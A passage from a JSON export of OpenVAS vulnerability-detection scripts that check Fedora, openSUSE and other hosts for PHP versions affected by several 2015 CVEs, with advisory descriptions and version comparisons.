See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869939\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-07 18:42:25 +0530 (Wed, 07 Oct 2015)\");\n script_cve_id(\"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-6834\", \"CVE-2015-6836\",\n \"CVE-2015-6835\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for php FEDORA-2015-14976\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"php on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-14976\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166337.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.13~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-07T00:00:00", "type": "openvas", "title": "Fedora Update for php FEDORA-2015-14977", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869941", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869941", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2015-14977\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869941\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-07 18:40:12 +0530 (Wed, 07 Oct 2015)\");\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6836\", \"CVE-2015-6835\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for php FEDORA-2015-14977\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"php on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-14977\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166357.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.6.13~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:56", "description": "This host is installed with PHP and is prone\n to Directory traversal vulnerability.", "cvss3": {}, "published": "2016-07-14T00:00:00", "type": "openvas", "title": "PHP Directory Traversal Vulnerability - Jul16 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310808617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808617", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_dir_traversal_vuln_lin.nasl 14181 2019-03-14 12:59:41Z cfischer $\n#\n# PHP Directory Traversal Vulnerability - Jul16 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808617\");\n script_version(\"$Revision: 14181 $\");\n script_cve_id(\"CVE-2014-9767\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_bugtraq_id(76652, 76649, 76733, 76734, 76738);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:59:41 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-14 12:14:00 +0530 (Thu, 14 Jul 2016)\");\n script_name(\"PHP Directory Traversal Vulnerability - Jul16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to Directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - An error in the 'ZipArchive::extractTo' function in\n 'ext/zip/php_zip.c' script.\n\n - The xsl_ext_function_php function in ext/xsl/xsltprocessor.c when libxml2\n is used, does not consider the possibility of a NULL valuePop return value\n before proceeding with a free operation after the principal argument loop.\n\n - Improper handling of multiple php_var_unserialize calls.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow remote\n attackers to read arbitrary empty directories, also to cause a denial of service.\");\n\n 
script_tag(name:\"affected\", value:\"PHP versions prior to 5.4.45, 5.5.x before\n 5.5.29, and 5.6.x before 5.6.13 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.45, or 5.5.29,\n or 5.6.13, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/03/16/20\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.4.45\"))\n{\n fix = '5.4.45';\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^5\\.5\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.28\"))\n {\n fix = '5.5.29';\n VULN = TRUE;\n }\n}\n\nelse if(phpVer =~ \"^5\\.6\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.12\"))\n {\n fix = '5.6.13';\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:35", "description": "This host is installed with PHP and is prone\n to Directory traversal vulnerability.", "cvss3": {}, "published": "2016-07-14T00:00:00", "type": "openvas", "title": "PHP Directory Traversal Vulnerability - Jul16 (Windows)", 
"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2018-10-17T00:00:00", "id": "OPENVAS:1361412562310808616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808616", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_dir_traversal_vuln_win.nasl 11938 2018-10-17 10:08:39Z asteins $\n#\n# PHP Directory Traversal Vulnerability - Jul16 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808616\");\n script_version(\"$Revision: 11938 $\");\n script_cve_id(\"CVE-2014-9767\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_bugtraq_id(76652, 76649, 76733, 76734, 76738);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-17 12:08:39 +0200 (Wed, 17 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-14 12:14:00 +0530 (Thu, 14 Jul 2016)\");\n script_name(\"PHP Directory Traversal Vulnerability - Jul16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to Directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - An error in the 'ZipArchive::extractTo' function in\n 'ext/zip/php_zip.c' script.\n\n - The xsl_ext_function_php function in ext/xsl/xsltprocessor.c when libxml2\n is used, does not consider the possibility of a NULL valuePop return value\n before proceeding with a free operation after the principal argument loop.\n\n - Improper handling of multiple php_var_unserialize calls.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow remote\n attackers to read arbitrary empty directories, also to cause a denial of service.\");\n\n 
script_tag(name:\"affected\", value:\"PHP versions prior to 5.4.45, 5.5.x before\n 5.5.29, and 5.6.x before 5.6.13 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.45, or 5.5.29,\n or 5.6.13, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/03/16/20\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.4.45\"))\n{\n fix = '5.4.45';\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^5\\.5\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.28\"))\n {\n fix = '5.5.29';\n VULN = TRUE;\n }\n}\n\nelse if(phpVer =~ \"^5\\.6\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.12\"))\n {\n fix = '5.6.13';\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:37:15", "description": "The remote host is missing an update for the 'php5'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2015-09-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for php5 (openSUSE-SU-2015:1628-1)", "bulletinFamily": "scanner", "cvss2": {}, 
"cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6832", "CVE-2015-6838"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850689", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850689", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850689\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-26 07:59:56 +0200 (Sat, 26 Sep 2015)\");\n script_cve_id(\"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for php5 (openSUSE-SU-2015:1628-1)\");\n\n 
script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php5'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The PHP5 script interpreter was updated to fix various security issues:\n\n * CVE-2015-6831: A use after free vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#942291] [bnc#942294] [bnc#942295]\n\n * CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject\n items could be used to crash php or potentially execute code.\n [bnc#942293]\n\n * CVE-2015-6833: A directory traversal when extracting ZIP files could be\n used to overwrite files outside of intended area. [bnc#942296]\n\n * CVE-2015-6834: A Use After Free Vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#945403]\n\n * CVE-2015-6835: A Use After Free Vulnerability in session unserialize()\n has been fixed which could be used to crash php or potentially execute\n code. [bnc#945402]\n\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. 
[bnc#945412]\");\n\n script_tag(name:\"affected\", value:\"php5 on openSUSE 13.2, openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:1628-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE13\\.2|openSUSE13\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", rpm:\"php5-enchant~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.6.1~36.1\", 
rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird\", rpm:\"php5-firebird~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-firebird-debuginfo\", rpm:\"php5-firebird-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", rpm:\"php5-iconv-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", rpm:\"php5-intl~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.6.1~36.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", 
